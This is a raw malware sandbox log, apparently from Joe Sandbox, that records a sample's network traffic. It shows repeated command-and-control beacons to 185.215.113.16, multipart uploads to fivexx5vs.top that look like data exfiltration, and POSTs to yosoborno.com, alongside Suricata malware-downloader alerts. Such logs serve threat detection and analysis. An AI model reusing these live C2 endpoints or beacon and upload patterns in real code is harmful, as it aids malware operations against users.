r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05

Source: Joe Sandbox View	IP Address: 95.179.163.21 95.179.163.21
Source: Joe Sandbox View	IP Address: 65.21.18.51 65.21.18.51
Source: Joe Sandbox View	IP Address: 195.133.48.136 195.133.48.136

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: DCI-ASIR DCI-ASIR

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49724 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49723 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 154.216.18.223:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49734 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49730 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49733 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49739 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49742 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary37490463User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: fivexx5vs.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary30639003User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 63841Host: fivexx5vs.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary35885869User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30057Host: fivexx5vs.top
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wgnxvkcddotte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://loonlkjdmre.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rdpalbeqriyet.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxqpkqxbcagfr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dwegqlgvtfhv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vohbymlahmj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rvrecysevqfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://anawxrbkfkfj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yftntduqpyxhree.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://glntlgidstliw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjdfeejtpkvhqtj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jcwfxkmtfjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jxhkilfoavetpm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vxvqsoujtjkuxr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xbebpqvhoemyp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxqvkuhtvdmvoqus.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oddsieoecyts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irppgyjsfec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wguxftgkott.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: yosoborno.com
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://denfiusyvarbl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: yosoborno.com

